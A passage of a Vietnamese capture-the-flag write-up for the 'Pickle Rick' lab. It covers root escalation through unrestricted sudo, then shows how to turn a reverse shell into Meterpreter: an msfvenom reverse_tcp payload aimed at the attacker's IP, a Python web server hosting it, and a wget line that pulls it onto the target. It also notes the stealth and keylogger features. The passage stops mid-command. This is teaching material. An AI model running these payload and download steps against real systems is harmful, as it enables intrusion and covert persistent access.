major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Đầu
|
||
tiên bắt đầu với Kernal exploit, cần phải
|
||
thu thập thông tin liên quan đến OS, kernel như sau:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_23"
|
||
o:spid="_x0000_i1034" type="#_x0000_t75" alt="A black screen with white text Description automatically generated with low confidence"
|
||
style='width:5in;height:213.6pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image042.png" o:title="A black screen with white text Description automatically generated with low confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=480 height=285
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image042.png"
|
||
alt="A black screen with white text Description automatically generated with low confidence"
|
||
v:shapes="Picture_x0020_23"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_24"
|
||
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:468pt;height:34.8pt;
|
||
visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image043.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=46
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image044.png" v:shapes="Picture_x0020_24"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết
|
||
hợp các điều trên có nghĩa là chúng ta cần tìm một
|
||
phần mềm khai thác lỗi cho phép nâng cấp quyền quản
|
||
trị trên Ubuntu 16.04.5 LTS hoặc Kernel 4.4.0-1072-aws được
|
||
viết bằng Bash, Perl, C hoặc có đuôi .elf (file thực
|
||
thi trên Linux).<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tiến
|
||
hành tìm lỗi những không mấy khả quan<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_25"
|
||
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:288.6pt;height:118.2pt;
|
||
visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image045.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=385 height=158
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image046.png" v:shapes="Picture_x0020_25"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết
|
||
quả không mấy khả quan nên sẽ chuyển qua cách
|
||
nâng cấp đặc quyền thứ 2 là sudo right. <o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kiến
|
||
thức:</span></b><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><span
|
||
style='mso-spacerun:yes'> </span>tất cả mọi thứ từ
|
||
thiết bị, công cụ, câu lệnh, interface, ip address,
|
||
port, v.v trên Linux đều là một file. Do đó, việc bạn
|
||
có thể sử dụng một công cụ ví dụ Perl hay một
|
||
dòng lệnh ví dụ ls được hay không phụ thuộc
|
||
hoàn toàn vào việc bạn có quyền tiếp cận, và thực
|
||
thi với file Perl hoặc file ls hay không. Mỗi account trong hệ
|
||
thống Linux thường sẽ được cấp
|
||
phép sử dụng một số công cụ hoặc câu lệnh
|
||
để thực hiện công việc của họ. Và các
|
||
công cụ hoặc câu lệnh này nếu không được
|
||
quản trị kỹ, chúng hoàn toàn có thể bị lợi
|
||
dụng để nâng cấp lên quyền quản trị
|
||
cao hơn, hoặc thậm chí là quyền quản trị
|
||
root.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
|
||
đó, cần kiểm tra quyền của account hiện tại:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_26" o:spid="_x0000_i1031"
|
||
type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:468pt;height:135pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image047.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=180
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image048.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_26"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Dựa
|
||
vào kết quả trên chúng ta có thể thấy, account của
|
||
chúng ta có quyền sử dụng bất kỳ công cụ và
|
||
câu lệnh nào đang có trên server Pickle Rick mà không cần phải
|
||
cung cấp password của account hiện tại hoặc
|
||
password của account root.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
|
||
không yêu cầu về password nên sử dụng câu lệnh
|
||
“sudo su” để nâng cấp đặc quyền lên root
|
||
luôn.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_27"
|
||
o:spid="_x0000_i1030" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:114.6pt;height:58.8pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image049.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=153 height=78
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image049.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_27"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Lúc
|
||
này xem như đã nắm được toàn bộ Server,
|
||
do đó nên đi vòng vòng kiếm flag cho thử thách thứ
|
||
3 thui, kết quả nhận được sẽ là:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_28"
|
||
o:spid="_x0000_i1029" type="#_x0000_t75" alt="Graphical user interface, text Description automatically generated"
|
||
style='width:330pt;height:153pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image050.png" o:title="Graphical user interface, text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=440 height=204
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image051.png"
|
||
alt="Graphical user interface, text Description automatically generated"
|
||
v:shapes="Picture_x0020_28"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraph style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l0 level1 lfo6'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Wingdings;mso-fareast-font-family:Wingdings;
|
||
mso-bidi-font-family:Wingdings'><span style='mso-list:Ignore'>ð<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>Giải được toàn bộ flag của
|
||
Pickle Rick<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>--------------------------------------------------------------------------------------------------------------------------------------------ĐÂY
|
||
LÀ PHẦN KIẾN THỨC LIÊN QUAN NHƯNG NÂNG CAO
|
||
HƠN------------<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>---------------------------------------------------------------------------------------------------------------------<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Trong
|
||
CTF, sau khi hoàn thành phần 3 bên trên là đã có thể coi
|
||
như đã chiến thắng. Nhưng khi đi làm pentest, sẽ
|
||
có khác biệt một tí. Khác biệt đó nằm ở chỗ
|
||
kết nối TCP reverse shell đang dùng vẫn chưa phải
|
||
là một kết nối bền vững và có thể bị
|
||
can thiệp bất cứ lúc nào do kết nối trên có thể
|
||
bị phát hiện bởi Task Manager. Chưa kể
|
||
đường truyền TCP reverse shell không được
|
||
mã hóa, dễ dẫn đến tình trạng lộ thông tin
|
||
nhạy cảm của cả pentester lẫn nạn nhân.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Để
|
||
phòng tránh việc đó, chúng ta sẽ nâng cấp đường
|
||
truyền từ TCP reverse shell thành Meterpreter shell. Ưu
|
||
điểm của Meterpreter shell so với TCP reverse shell
|
||
như sau:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Meterpreter sử
|
||
dụng in-memory DLL injection, nghĩa là nó sẽ chỉ ghi dữ
|
||
liệu trên RAM mà thôi, và không ghi gì vào ổ cứng cả,
|
||
do đó hạn chế việc để lại dấu vết.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết nối
|
||
meterpreter không tạo ra process mới mà sẽ tự inject nó
|
||
vào process đã bị tấn công khiến nó gần như
|
||
vô hình trước các chương trình như Task Manager trên
|
||
Windows. Khi process bị meterpreter tấn công bị kill,
|
||
meterpreter sẽ tự động nhảy sang một process
|
||
khác để duy trì kết nối.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Kết nối
|
||
meterpreter được mã hóa.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l6 level1 lfo7'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Do
|
||
meterpreter là một tính năng của Metasploit, sử dụng
|
||
meterpreter cho phép pentester sử dụng luôn các module post-exploitation
|
||
ví dụ như keyblogger, cổng hậu, v.v. có sẵn trên
|
||
Metasploit để tấn công sâu hơn vào hệ thống của
|
||
nạn nhân.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chúng
|
||
ta sẽ bắt đầu nâng cấp đường truyền
|
||
từ TCP reverse shell thành Meterpreter shell.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sử
|
||
dụng câu lệnh sau để tạo ra một file meterpreter<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><i><span style='font-size:
|
||
13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfvenom
|
||
-p linux/x86/meterpreter/reverse_tcp LHOST=10.4.43.108 LPORT=9999 -f elf -o
|
||
shell.elf<o:p></o:p></span></i></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Trong
|
||
đó:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
|
||
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfvenom:</span></b><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'> Tên câu lệnh<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><span style='font-size:13.0pt;line-height:107%;
|
||
font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-<b>p
|
||
linux/x86/meterpreter/reverse_tcp:</b> Dạng payload hay dạng kết
|
||
nối sẽ sử dụng<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
|
||
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>LHOST và
|
||
LPORT:</span></b><span style='font-size:13.0pt;line-height:107%;font-family:
|
||
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
|
||
major-latin;mso-bidi-theme-font:major-latin'> Địa chỉ IP và
|
||
port dùng để nhận shell trên máy Kali của hacker<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
|
||
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-f:</span></b><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'> Format của dữ liệu đầu ra. Ở
|
||
đây chọn elf là extension file thực thi của Linux.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-align:justify;text-indent:-.25in;
|
||
mso-list:l3 level1 lfo8'><![if !supportLists]><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:Symbol;mso-fareast-font-family:Symbol;mso-bidi-font-family:
|
||
Symbol'><span style='mso-list:Ignore'>·<span style='font:7.0pt "Times New Roman"'>
|
||
</span></span></span><![endif]><b><span style='font-size:13.0pt;line-height:
|
||
107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;
|
||
mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>-o:</span></b><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'> Xuất ra file có tên là shell.elf<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tiếp
|
||
theo sử dụng câu lệnh<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><b><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>Python3 -m http.server 8000<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Câu
|
||
lệnh trên sử dụng một module của Python có tên là
|
||
SimpleHTTPServer để biến directory hiện tại thành
|
||
một webserver cho phép trao đổi file tại port 8000 với
|
||
địa chỉ IP là IP của hacker. Webserver này có thể
|
||
được truy cập bởi tất cả các máy ở
|
||
trong cùng mạng.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_30"
|
||
o:spid="_x0000_i1028" type="#_x0000_t75" alt="Graphical user interface, text, application Description automatically generated"
|
||
style='width:415.8pt;height:1in;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image052.png" o:title="Graphical user interface, text, application Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=554 height=96
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image052.png"
|
||
alt="Graphical user interface, text, application Description automatically generated"
|
||
v:shapes="Picture_x0020_30"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Sử
|
||
dụng câu lệnh sau trên server để download<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><b><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>wget http://10.4.43.108:8000/shell.elf<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_31"
|
||
o:spid="_x0000_i1027" type="#_x0000_t75" alt="A screenshot of a computer Description automatically generated with medium confidence"
|
||
style='width:418.8pt;height:166.2pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image053.png" o:title="A screenshot of a computer Description automatically generated with medium confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=558 height=222
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image054.png"
|
||
alt="A screenshot of a computer Description automatically generated with medium confidence"
|
||
v:shapes="Picture_x0020_31"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thực
|
||
hiện cấp quyền thực thi trên máy Server và excute file
|
||
đó<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_32"
|
||
o:spid="_x0000_i1026" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:141.6pt;height:45pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image055.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=189 height=60
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image055.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_32"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Quay
|
||
lại trên máy kali, tiến hành dùng metasploit để nhận
|
||
kết nối trỏ về<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>msfconsole<o:p></o:p></span></b></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><b><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>use
|
||
